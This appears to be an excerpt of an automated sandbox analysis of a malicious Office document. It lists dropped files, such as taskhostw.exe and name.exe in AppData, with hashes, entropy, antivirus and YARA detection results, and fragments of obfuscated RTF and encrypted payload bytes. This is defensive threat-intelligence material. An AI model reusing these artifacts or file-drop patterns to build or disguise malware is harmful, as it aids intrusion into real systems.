                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):76472
                                                                Entropy (8bit):3.025081600163608
                                                                Encrypted:false
                                                                SSDEEP:384:luYYST5PIYfLe2b52XPl6hAJC00EddMdf0Ii90Z5xxr8sdEdeC:4igYfqg52XPl6hAJC0irRHC
                                                                MD5:A4B79FF3D7725F69AB98C49A72805D64
                                                                SHA1:8617AF425CE74F816B2CE28FF7BF08A7F5317030
                                                                SHA-256:2DE8B86E62DE48780D92E82B3132F559DF0324A000F9BAFC8CAF3D2789D17CE5
                                                                SHA-512:3B7E25DBDFDAD51FFD8DB140091405FABD3242704C0FD0517CEB10C59E5AF57098CA41C3DCA9F9E80045D8A75EE8415927467457E636EA475C0BE95063C94C49
                                                                Malicious:false
                                                                Preview:....l..............................eQ.. EMF.....*..y.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................L...d.......).......G.......)...........!..............?...........?............................
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:Rich Text Format data, version 1
                                                                Category:dropped
                                                                Size (bytes):88612
                                                                Entropy (8bit):2.9267754728039796
                                                                Encrypted:false
                                                                SSDEEP:768:t9QdTYkH9SFwul5U0mGL8ogS2fw6Vgr9JE:Mkkdzuglo8og3fJVmE
                                                                MD5:C7B4EC460B896CCD9F368467D06EE44B
                                                                SHA1:58D4ED5D5791401F4555D6278A179E5C65563C8A
                                                                SHA-256:7B33DE62DAFEF125FE428AFE47E9A353749A6632D58809CE428B7514886B49B6
                                                                SHA-512:D82B5ECC391F92E17161CE7B98F62B273F9A51D6C294272AACC1EFA1B2D2DC7C8C1095103197D6FE023B21D8B161978C4C6073AED78758649031DA99FD687D9C
                                                                Malicious:false
                                                                Yara Hits:
                                                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.doc, Author: ditekSHen
                                                                Preview:{\rtf1..{\*\fuAM1lx8ZkPnbkOCimO5dV3rHvsM8U67kI1ddcL4KhvChijOW80CM7opbLd7k2Mg4EWGPEhOERIGzLNu}..{\2132927736(??80.<2?|]-~.(`,,($$%3%>*?['%?970`6@9%24?%>=!/?9]*%.`_:=..*-!8]6?.*2+>4<33=[?.$]&%/~-6>+_#,%?:;-9,?(|6'=8&-69%.9[=*~).*[4^@?3%:%].$?0/^3?!4]%]=1).?9`<$]0.2>;?@15,?19?'!!:???).621*9.?<9?#',*?@.)>|94,!<%'.?*$??:>'?9]_`<+]3`=.%0./.2?.|^0..7/>0&.3/5%]|[!/3&4?%~?.|9#7]>--,~1`%.)>]?|+1^|6/35'?/310&.^??8-,?8^/9:00|`:_^)>+&?,?2+#?[$|1+'$??(%.(@=7.)?%,26?<5?:^9.**_%!2?;1.0>^`7.!?)7>83?`]7.(3?4+0<=)%+~8?9?(?3^/@9_:&%5.'^324_0!]*48'[??.7#2~4?>~=4?[0(7@>@.?5%.*3.6$1@??=.?-01!`(@53.@$8$#9#?`.($5?:|9#?%#@__?&?$?/6./5~>(?|0(/.#_??%.|,#-[@18.?_%.=?<~|1/96[^3,~4?>-+=#=.|,/`;:~&??<]%?.[].78?.09.4..(_?.''(?!@]?@%_~/@%#@?.~,~:?@@?2+|&?++>>#5?|@=1@..']~89+4~/=:.`5<|*96,??%5>:+=;)9?+*&^^7(*;!?)<_(`(?`_;:(-=:?.!+@?=2~;???.??:9?9<7*<)0%;6%7~%'??1~2*],3?5_?0].'2>*$'48:,/=<:=[$??*<=3?:1.;>7:4>^|9]^'4=+[^*~&%+@-?|`&.!].@|:9%;[+4?-<'@5)6?.%62?=-)>&(.>(89`&83'?.'-|?.'','/?:]3`.?|$4=.%%2|^^[78++?:<5)[2|4]?$'=
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):2.586762147643526
                                                                Encrypted:false
                                                                SSDEEP:96:NC5MPCF9zDGqIH7fdbuHPhxHMP1F9z7GqIH7fdbuHPhx:NjPCrdI78vh+P1r1I78vh
                                                                MD5:662ABA45E30897D16AD40638A1569440
                                                                SHA1:631E19B06BACB43D41361BA167AC1FA65EC6F005
                                                                SHA-256:66CD190E24235D876A084F11F47477BD8F1E94882FE8E1E6FF53BEDE0D219297
                                                                SHA-512:5539B3E12B585BDCD447449745EE21FA91E0714A37C6CBEBD32086E61080320B56DDDB28B4EA228D0BE504C1B3A39918FC883FF0BA432857753AEC12D95A5E1D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1024
                                                                Entropy (8bit):0.05390218305374581
                                                                Encrypted:false
                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):17408
                                                                Entropy (8bit):3.5642856656705773
                                                                Encrypted:false
                                                                SSDEEP:384:Mt6D48CJfyMb7EyonNGiRl6yjRA0yLejsItgQnl8HbAj77YM:+Tloy+fpVZyWsItKHcjgM
                                                                MD5:99035C431377FE236500A36805A8D212
                                                                SHA1:DB158A2376A3392B59F9D121101A4BB4BE8A952A
                                                                SHA-256:CF987610C85B609396FB020102B150965D45A49E44E8535F3708414E52A2F4AA
                                                                SHA-512:A7B060B4373679FB9262EBC2C81D8C2CE81DB21E0FF4A7C6AEA9ADB06A6E7C42B5291C9454E9A2E175A0B9000A06B391098054BC4B9E8C6937AD3120219F41C5
                                                                Malicious:false
                                                                Preview:1.3.2.9.2.7.7.3.6.(.?.?.8.0...<.2.?.|.].-.~...(.`.,.,.(.$.$.%.3.%.>.*.?.[.'.%.?.9.7.0.`.6.@.9.%.2.4.?.%.>.=.!./.?.9.].*.%...`._.:.=.....*.-.!.8.].6.?...*.2.+.>.4.<.3.3.=.[.?...$.].&.%./.~.-.6.>.+._.#.,.%.?.:.;.-.9.,.?.(.|.6.'.=.8.&.-.6.9.%...9.[.=.*.~.)...*.[.4.^.@.?.3.%.:.%.]...$.?.0./.^.3.?.!.4.].%.].=.1.)...?.9.`.<.$.].0...2.>.;.?.@.1.5.,.?.1.9.?.'.!.!.:.?.?.?.)...6.2.1.*.9...?.<.9.?.#.'.,.*.?.@...).>.|.9.4.,.!.<.%.'...?.*.$.?.?.:.>.'.?.9.]._.`.<.+.].3.`.=...%.0.../...2.?...|.^.0.....7./.>.0.&...3./.5.%.].|.[.!./.3.&.4.?.%.~.?...|.9.#.7.].>.-.-.,.~.1.`.%...).>.].?.|.+.1.^.|.6./.3.5.'.?./.3.1.0.&...^.?.?.8.-.,.?.8.^./.9.:.0.0.|.`.:._.^.).>.+.&.?.,.?.2.+.#.?.[.$.|.1.+.'.$.?.?.(.%...(.@.=.7...).?.%.,.2.6.?.<.5.?.:.^.9...*.*._.%.!.2.?.;.1...0.>.^.`.7...!.?.).7.>.8.3.?.`.].7...(.3.?.4.+.0.<.=.).%.+.~.8.?.9.?.(.?.3.^./.@.9._.:.&.%.5...'.^.3.2.4._.0.!.].*.4.8.'.[.?.?...7.#.2.~.4.?.>.~.=.4.?.[.0.(.7.@.>.@...?.5.%...*.3...6.$.1.@.?.?.=...?.-.0.1.!.`.(.@.5.3...@.$.8.$.#.9.#.?.`...(.$.5.?.:.|.
                                                                Process:C:\Users\user\AppData\Roaming\taskhostw.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):494592
                                                                Entropy (8bit):7.5383843814540175
                                                                Encrypted:false
                                                                SSDEEP:12288:iU98JzlqYLe9tSpC5R8F0B5hAKmUAhVAoMIAj:2s2e9tS08FK5MUN1j
                                                                MD5:68E968B0759CF46217226477C26C2FB0
                                                                SHA1:ACBB76B2C0808F932D217AE73184BA14B18D27B8
                                                                SHA-256:604A0CC31BA6D8753E394982E8B84A59B260179B2313F314CAC53CEB663C996B
                                                                SHA-512:8016E87C2B29BE1802DF384F46F0568EF4EA2BE22732BD554AA7E95FF12373B0381AD0CFD8CA1C795E8B5D7DC94E210ACC8F32DD21CBBCA4ECB42D6E48FA8709
                                                                Malicious:false
                                                                Preview:...IBRXL=83R..IA.XL983RZ.IARXL983RZIIARXL983RZIIARXL983RZIIAJYL96,.TI.H.y.8t.s.! 2r(>V_A37i* <6#M.Q7z;</r1".||.z$&%7vA42.RZIIARX@B...@.7.H.2q".,..n?.B.G.w$.S.,...FeH.7.#.&.#.M..X7.H.2.|.-.S.?...FJ).$...-2V.Fr0.7.[.&.#.M$A.7...3.".,..`?.B.G.w.%.S.,.%ZP{H.7IARXL983RZIIARXL983RZIIA..L9t2UZ..4XL983RZI.APYG863R(LIADZL983R..JARHL98.WZII.RX\983PZILASXL983WZHIARXL9.;RZMIARXL9:3R.IIQRX\983RJIIQRXL983BZIIARXL983R.OAVYL98.UZA.ARXL983RZIIARXL983R.NI.iXLi.5RbIIARXL983RZIIARXL98.\IQARX..>3.ZIIARXL983RZ.LAR]L983RZIIARXL983RZIIARXL983|.,15RXL.I6RZYIAR*I987RZIIARXL983RZIiAR8bK\R&;II.+YL9.6RZ3HAR.I983RZIIARXL98sRZ.g%3,-983..IIAB_L963RZ.OARXL983RZIIAR.L9..&6:IARXE983R*NIAPXL9.5RZIIARXL983RZ.IA.v+_QW!ZIyCRXL.?3R^IIAR_L983RZIIARXL9x3R.g;2 ;L98;.ZII.UXLu83R^NIARXL983RZIIA.XLy.A76&*AR.w983.]II}RXLi?3RZIIARXL983R.II.RXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL983RZIIARXL98
                                                                Process:C:\Users\user\AppData\Roaming\taskhostw.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):400390
                                                                Entropy (8bit):7.97463545286396
                                                                Encrypted:false
                                                                SSDEEP:12288:mwkhSXui11zbhQKe0I5igjSUNjgoDVSFnq:m251z25ZeUNjg+Vz
                                                                MD5:336DC045C8C6A4764B31D43FD360B020
                                                                SHA1:0DBEE41F0BF6FEF4F8C7BD47C6FD386CB572067B
                                                                SHA-256:D7C56FFC8A357E732D1922254D35AC9EF9FA39B15F0C4509E5D0CF17CCB64EC4
                                                                SHA-512:A7C4FE0FBEFA21D7D1217B75B3BC44E08582FC69FAED7144736375D7934CAF25FA40441A4AE21BEF339F056CDB927F8E42F94CAA5B9140C42A1F309DAB88509B
                                                                Malicious:false
                                                                Preview:EA06......;4..J.L..&u-..A.V)........j@.y....t..2s6.z*...#?y.N...:C .\...~.3..eR...GM.Tf...._r..7....$.If.j..e..M.....F....&...\d^Yf..n..hY.?.kw.i.yyf....Yi.."G..Ad~.n..X........-.T....s?F.Jp.Md7'-.U..k..?7.V.h$..M.Ps.}.[.3..,.Xm....X8.|4....B......`....Q.d..2.......[Z..B.G.M.u)E2.A.V......A.R....\......b.Z..(50.z.Z..,b1;.V...x.....MD...*P.\.X.!;....5`..q...0 ._.uN..m5.e..5.X.h.n...I....OT.g....f.A.W@v~..Y1.....L.Z.....L.q7.,.m4....K.T..M';+..5....A.K. ........fr.h.......*....Bni..?.b.9.Gd.i...E..eT.M...Bq...?.....J......I.......gR......o..3.F...v.,N. ..F.X.]@.J.8....V)....o6.J.5,...X.Wi4....i...|..M&........~9l..R.L&...6.Pw[[..qj......R.,r...x..: ...Y...9..ja...l..e.7...i8....B..+.I,2........qZ.~a.Z.a..._I......s8^g.y....)@.....g.....7..g0.,.@...'.2.B.=....I...gF.........Y...t....Y...R...iw...T..&.:......J..2>....X.......S...p.Y..5.`......3*f.!|..9..J.$....-.j.B.@q.9.*...Ru>.m2sP..........~.Q .g.W..!`...[...f.V... ..8.Z...t.L.=..z..%f...n.|..B...4'..
                                                                Process:C:\Users\user\AppData\Roaming\taskhostw.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):12940
                                                                Entropy (8bit):7.727914831066413
                                                                Encrypted:false
                                                                SSDEEP:192:TP936RuGCkiaFqfIh11paNCIegDLay+QeRwKLR8cWP2kc67QNjpgDUeq6Ga:YRFqfIfaRHayZwLR8rJc67QNjpgg2v
                                                                MD5:A9350F97650A3D649560ABAA38CCBE7C
                                                                SHA1:C01DDE0AC867BBE9ED8D93713C993751E8B1FED6
                                                                SHA-256:912FE5024C06FBB6643CC0AFC64414ECDDA4A251CC6D1F5805960B544B73C53A
                                                                SHA-512:8A2024CC0F6C3B72AD554DED7A93D61024ECDB5AF56B550F6A145468EB87CD7AD583A8A1B0C4390DCB5082AC66FCC247CD8299C3A598D95A192220A597009197
                                                                Malicious:false
                                                                Preview:EA06..p.......f.Ll.[5.a3.L....q;.Ng.Y..b..M....k9.Yg.i...1.NgS....<.X.s....0..'s..u;.N&.p.:g:.Ngsy...d.N...t.q9.Nf.i..b.Y...9..l.Y..h.....ac....4...k...k....kd....]..'V)....I...e.Y...7.Ol3I...K ...mf.....8.Y...U..d.N...:...V`...:...%.8.M.v......Y&.0.f.i.Xf.P.NO'3K ..h..&@...N,.....izsf.M..3c....99.M.....<|.Y.....y..v......K`0.M..K..s6....h....&.<....M...z.9.O&. ..Y.+......-..<.M@x=h...`.^.Yl.0..q9...k8..&.y..s7...rwh.N@R.e.Z..q:..xfw;...vo9...fw9...v.8...f.9..Zr{5.L.p.8....:...<fz.e..v.u...N..#..m G^...rn.u.....7.:....S....@K...V'@)D......b.TN..d...|v)...7...z.6...K;4.X.vi...@..h...I...c.K=.r......g.X...g.L..>....5.h.<;7....\.N@4.;...K..@4.....vP?..e.....6....-...c...|3i..p....'.._..p....l.._......-..7... .@..5..l...yd.M......l.E...N..kE..d..ls+$.{e..v.G.n.). .i0.....,.y5..6.$Fq2.Y...D..<..-6..D.Y..,.`.F.9..f.K@..g.......sf....2....v.&*.8.N&.@.LM..K%..3.>.\.c..Q.~fS....n3K8.&'.I...c..'.8.. ....e1.x...4..2bl..Z.VI.. .....8.......,..:..S...k8..nno6..nrg5
                                                                Process:C:\Users\user\AppData\Local\directory\name.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):400390
                                                                Entropy (8bit):7.97463545286396
                                                                Encrypted:false
                                                                SSDEEP:12288:mwkhSXui11zbhQKe0I5igjSUNjgoDVSFnq:m251z25ZeUNjg+Vz
                                                                MD5:336DC045C8C6A4764B31D43FD360B020
                                                                SHA1:0DBEE41F0BF6FEF4F8C7BD47C6FD386CB572067B
                                                                SHA-256:D7C56FFC8A357E732D1922254D35AC9EF9FA39B15F0C4509E5D0CF17CCB64EC4
                                                                SHA-512:A7C4FE0FBEFA21D7D1217B75B3BC44E08582FC69FAED7144736375D7934CAF25FA40441A4AE21BEF339F056CDB927F8E42F94CAA5B9140C42A1F309DAB88509B
                                                                Malicious:false
                                                                Preview:EA06......;4..J.L..&u-..A.V)........j@.y....t..2s6.z*...#?y.N...:C .\...~.3..eR...GM.Tf...._r..7....$.If.j..e..M.....F....&...\d^Yf..n..hY.?.kw.i.yyf....Yi.."G..Ad~.n..X........-.T....s?F.Jp.Md7'-.U..k..?7.V.h$..M.Ps.}.[.3..,.Xm....X8.|4....B......`....Q.d..2.......[Z..B.G.M.u)E2.A.V......A.R....\......b.Z..(50.z.Z..,b1;.V...x.....MD...*P.\.X.!;....5`..q...0 ._.uN..m5.e..5.X.h.n...I....OT.g....f.A.W@v~..Y1.....L.Z.....L.q7.,.m4....K.T..M';+..5....A.K. ........fr.h.......*....Bni..?.b.9.Gd.i...E..eT.M...Bq...?.....J......I.......gR......o..3.F...v.,N. ..F.X.]@.J.8....V)....o6.J.5,...X.Wi4....i...|..M&........~9l..R.L&...6.Pw[[..qj......R.,r...x..: ...Y...9..ja...l..e.7...i8....B..+.I,2........qZ.~a.Z.a..._I......s8^g.y....)@.....g.....7..g0.,.@...'.2.B.=....I...gF.........Y...t....Y...R...iw...T..&.:......J..2>....X.......S...p.Y..5.`......3*f.!|..9..J.$....-.j.B.@q.9.*...Ru>.m2sP..........~.Q .g.W..!`...[...f.V... ..8.Z...t.L.=..z..%f...n.|..B...4'..
                                                                Process:C:\Users\user\AppData\Local\directory\name.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):12940
                                                                Entropy (8bit):7.727914831066413
                                                                Encrypted:false
                                                                SSDEEP:192:TP936RuGCkiaFqfIh11paNCIegDLay+QeRwKLR8cWP2kc67QNjpgDUeq6Ga:YRFqfIfaRHayZwLR8rJc67QNjpgg2v
                                                                MD5:A9350F97650A3D649560ABAA38CCBE7C
                                                                SHA1:C01DDE0AC867BBE9ED8D93713C993751E8B1FED6
                                                                SHA-256:912FE5024C06FBB6643CC0AFC64414ECDDA4A251CC6D1F5805960B544B73C53A
                                                                SHA-512:8A2024CC0F6C3B72AD554DED7A93D61024ECDB5AF56B550F6A145468EB87CD7AD583A8A1B0C4390DCB5082AC66FCC247CD8299C3A598D95A192220A597009197
                                                                Malicious:false
                                                                Preview:EA06..p.......f.Ll.[5.a3.L....q;.Ng.Y..b..M....k9.Yg.i...1.NgS....<.X.s....0..'s..u;.N&.p.:g:.Ngsy...d.N...t.q9.Nf.i..b.Y...9..l.Y..h.....ac....4...k...k....kd....]..'V)....I...e.Y...7.Ol3I...K ...mf.....8.Y...U..d.N...:...V`...:...%.8.M.v......Y&.0.f.i.Xf.P.NO'3K ..h..&@...N,.....izsf.M..3c....99.M.....<|.Y.....y..v......K`0.M..K..s6....h....&.<....M...z.9.O&. ..Y.+......-..<.M@x=h...`.^.Yl.0..q9...k8..&.y..s7...rwh.N@R.e.Z..q:..xfw;...vo9...fw9...v.8...f.9..Zr{5.L.p.8....:...<fz.e..v.u...N..#..m G^...rn.u.....7.:....S....@K...V'@)D......b.TN..d...|v)...7...z.6...K;4.X.vi...@..h...I...c.K=.r......g.X...g.L..>....5.h.<;7....\.N@4.;...K..@4.....vP?..e.....6....-...c...|3i..p....'.._..p....l.._......-..7... .@..5..l...yd.M......l.E...N..kE..d..ls+$.{e..v.G.n.). .i0.....,.y5..6.$Fq2.Y...D..<..-6..D.Y..,.`.F.9..f.K@..g.......sf....2....v.&*.8.N&.@.LM..K%..3.>.\.c..Q.~fS....n3K8.&'.I...c..'.8.. ....e1.x...4..2bl..Z.VI.. .....8.......,..:..S...k8..nno6..nrg5
                                                                Process:C:\Users\user\AppData\Local\directory\name.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):400390
                                                                Entropy (8bit):7.97463545286396
                                                                Encrypted:false
                                                                SSDEEP:12288:mwkhSXui11zbhQKe0I5igjSUNjgoDVSFnq:m251z25ZeUNjg+Vz
                                                                MD5:336DC045C8C6A4764B31D43FD360B020
                                                                SHA1:0DBEE41F0BF6FEF4F8C7BD47C6FD386CB572067B
                                                                SHA-256:D7C56FFC8A357E732D1922254D35AC9EF9FA39B15F0C4509E5D0CF17CCB64EC4
                                                                SHA-512:A7C4FE0FBEFA21D7D1217B75B3BC44E08582FC69FAED7144736375D7934CAF25FA40441A4AE21BEF339F056CDB927F8E42F94CAA5B9140C42A1F309DAB88509B
                                                                Malicious:false
                                                                Preview:EA06......;4..J.L..&u-..A.V)........j@.y....t..2s6.z*...#?y.N...:C .\...~.3..eR...GM.Tf...._r..7....$.If.j..e..M.....F....&...\d^Yf..n..hY.?.kw.i.yyf....Yi.."G..Ad~.n..X........-.T....s?F.Jp.Md7'-.U..k..?7.V.h$..M.Ps.}.[.3..,.Xm....X8.|4....B......`....Q.d..2.......[Z..B.G.M.u)E2.A.V......A.R....\......b.Z..(50.z.Z..,b1;.V...x.....MD...*P.\.X.!;....5`..q...0 ._.uN..m5.e..5.X.h.n...I....OT.g....f.A.W@v~..Y1.....L.Z.....L.q7.,.m4....K.T..M';+..5....A.K. ........fr.h.......*....Bni..?.b.9.Gd.i...E..eT.M...Bq...?.....J......I.......gR......o..3.F...v.,N. ..F.X.]@.J.8....V)....o6.J.5,...X.Wi4....i...|..M&........~9l..R.L&...6.Pw[[..qj......R.,r...x..: ...Y...9..ja...l..e.7...i8....B..+.I,2........qZ.~a.Z.a..._I......s8^g.y....)@.....g.....7..g0.,.@...'.2.B.=....I...gF.........Y...t....Y...R...iw...T..&.:......J..2>....X.......S...p.Y..5.`......3*f.!|..9..J.$....-.j.B.@q.9.*...Ru>.m2sP..........~.Q .g.W..!`...[...f.V... ..8.Z...t.L.=..z..%f...n.|..B...4'..
                                                                Process:C:\Users\user\AppData\Local\directory\name.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):12940
                                                                Entropy (8bit):7.727914831066413
                                                                Encrypted:false
                                                                SSDEEP:192:TP936RuGCkiaFqfIh11paNCIegDLay+QeRwKLR8cWP2kc67QNjpgDUeq6Ga:YRFqfIfaRHayZwLR8rJc67QNjpgg2v
                                                                MD5:A9350F97650A3D649560ABAA38CCBE7C
                                                                SHA1:C01DDE0AC867BBE9ED8D93713C993751E8B1FED6
                                                                SHA-256:912FE5024C06FBB6643CC0AFC64414ECDDA4A251CC6D1F5805960B544B73C53A
                                                                SHA-512:8A2024CC0F6C3B72AD554DED7A93D61024ECDB5AF56B550F6A145468EB87CD7AD583A8A1B0C4390DCB5082AC66FCC247CD8299C3A598D95A192220A597009197
                                                                Malicious:false
                                                                Preview:EA06..p.......f.Ll.[5.a3.L....q;.Ng.Y..b..M....k9.Yg.i...1.NgS....<.X.s....0..'s..u;.N&.p.:g:.Ngsy...d.N...t.q9.Nf.i..b.Y...9..l.Y..h.....ac....4...k...k....kd....]..'V)....I...e.Y...7.Ol3I...K ...mf.....8.Y...U..d.N...:...V`...:...%.8.M.v......Y&.0.f.i.Xf.P.NO'3K ..h..&@...N,.....izsf.M..3c....99.M.....<|.Y.....y..v......K`0.M..K..s6....h....&.<....M...z.9.O&. ..Y.+......-..<.M@x=h...`.^.Yl.0..q9...k8..&.y..s7...rwh.N@R.e.Z..q:..xfw;...vo9...fw9...v.8...f.9..Zr{5.L.p.8....:...<fz.e..v.u...N..#..m G^...rn.u.....7.:....S....@K...V'@)D......b.TN..d...|v)...7...z.6...K;4.X.vi...@..h...I...c.K=.r......g.X...g.L..>....5.h.<;7....\.N@4.;...K..@4.....vP?..e.....6....-...c...|3i..p....'.._..p....l.._......-..7... .@..5..l...yd.M......l.E...N..kE..d..ls+$.{e..v.G.n.). .i0.....,.y5..6.$Fq2.Y...D..<..-6..D.Y..,.`.F.9..f.K@..g.......sf....2....v.&*.8.N&.@.LM..K%..3.>.\.c..Q.~fS....n3K8.&'.I...c..'.8.. ....e1.x...4..2bl..Z.VI.. .....8.......,..:..S...k8..nno6..nrg5
                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1fad000f, page size 32768, DirtyShutdown, Windows version 6.1
                                                                Category:dropped
                                                                Size (bytes):21037056
                                                                Entropy (8bit):1.1388616017741526
                                                                Encrypted:false
                                                                SSDEEP:24576:dO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:dOEXs1LuHqqEXwPW+RHA6m1fN
                                                                MD5:FCB38CBE62FC825597AF721A2B9E2B46
                                                                SHA1:27F13F33D3F59E74DF4CBDC663016F5D7DED75F4
                                                                SHA-256:BFEDE9F9A5691EB8E88F12DEF75B6A145882FE57197D30FE064115C4CF34A5CF
                                                                SHA-512:3429FFA2A799634826A3F42FFAD866EA42E96F740BF67129105AF4E3EDB2B71D72CEC1EE504F092073F3732C398D23DF9E66633DAA3800CC5B8EAD6A72D40BB8
                                                                Malicious:false
                                                                Preview:....... ........................u..............................;:...{..('...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):2
                                                                Entropy (8bit):1.0
                                                                Encrypted:false
                                                                SSDEEP:3:Qn:Qn
                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                Malicious:false
                                                                Preview:..
                                                                Process:C:\Users\user\AppData\Roaming\taskhostw.exe
                                                                File Type:ASCII text, with very long lines (28674), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):28674
                                                                Entropy (8bit):4.437033064729596
                                                                Encrypted:false
                                                                SSDEEP:768:3B/xREbEXiee0eaPQjby+l5xB3FG60914KhOG7sDUjb6Rc1P:TubEXiegNl5xqbb4KhODUjbKqP
                                                                MD5:8286378171E4C2B52782449814A06653
                                                                SHA1:F950AEA27B1C5416406C248A41253679ED182BFA
                                                                SHA-256:4DC4DEA969F1A530D82D02ED8D72BE00404F8E32973430DC55EAE380F95D92DA
                                                                SHA-512:9B9B2A8BF2B8559EAFC93AE06A6C8C1D3D8ED074353D827CA04E0DE7E1FA5214BFAAF98F645114E826E898B0B9302AB16AAB18D9CA2443D7BC06574605D3EC85
                                                                Malicious:false
                                                                Preview:1z898cgf<1fefg032340688;b98e40123467:<8596e=662340129:8:6g<6cc:601234078;=56:;f87g340123:69;798bd<:512340189<95f;gbb8f40123467:<959ge<342340129:8:68=0c;6601234078;=4e;5fa3g340123:69;8995d;:412340189<957<:b:8f40123467:<8d::ee6d2340129:8:78=a45f467:<85:ee=6f2340129:8::g84ghijfgdd;412340189<9:77:fghijfc:9801234078;=866;jfghijb:8f40123467:<<d5cijfghifa7e340123:69;<94dhijfghe<2f2340129:8::88eghijfgd<:412340189<99f84fghijfcc9g01234078;=9675jfghijb98f40123467:<<566ijfghi73d;9:8::g96ghijfgdd;512340189<967g4b99640123467:<85e4e=662340129:8:6gh4cc:601234078;=56f9f845340123:69;79d9d<7212340189<95fgebb4h40123467:<95eee<652340129:8:68hec;9g01234078;=4eg3fa7e340123:69;89e356g078;=46g7f973340123:69;;h69hijfghee652340129:8:;8:aghijfgd;;612340189<9979gfghijfc;9501234078;=8e8hjfghijbb9340123467:<=582ijfghif87;340123:69;;973hijfghe=342340129:8::g;4ghijfgdd7212340189<9:7::fghijfc:5i01234078;=869;jfghijb:8740123467:<<d8cijfghifa7e340123:69;<97dhijfghe<6d2340129:8::8;eghijfg56g978;=4e:3fa85340123:69;89a1d;:8
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):131072
                                                                Entropy (8bit):0.025493604434434047
                                                                Encrypted:false
                                                                SSDEEP:6:I3DPc+7O9HvxggLRFCAQ3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPZuPuvYg3J/
                                                                MD5:69D299397149C93558E1A04EC1453160
                                                                SHA1:F2D1B95DA0CD6B6165477524B432298B09C86A32
                                                                SHA-256:3C91B7A639D36EE8EE4AE2B02EAF3269A75B02230AD90EE000E335DE3FFDF2F9
                                                                SHA-512:E5BE3098F0BEB6FEFA6253D723E950AA09C90E87D30638313C8981802512F32759224A8FF5FEBB3B11CE3D3CE0BF3F3A0EF804FD77A3EBF80AE095C94339CC3F
                                                                Malicious:false
                                                                Preview:......M.eFy...z....T.K...V...[S,...X.F...Fa.q............................I.=mD.J...(,H........=.V...L...s`.F......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):131072
                                                                Entropy (8bit):0.02573908657392288
                                                                Encrypted:false
                                                                SSDEEP:6:I3DPcHvyoKuP9HvxggLRj8/etf/tRXv//4tfnRujlw//+GtluJ/eRuj:I3DPU9PPceZbvYg3J/
                                                                MD5:21DCCF6BAE0719DCDB0533E1E50F6D82
                                                                SHA1:44A5CF1723E1EBED117FB33C384718A14C6DB7E0
